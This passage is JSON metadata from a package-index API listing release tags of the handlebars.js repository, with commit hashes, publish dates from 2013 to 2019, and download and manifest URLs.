","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@tmp-1252-backup","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars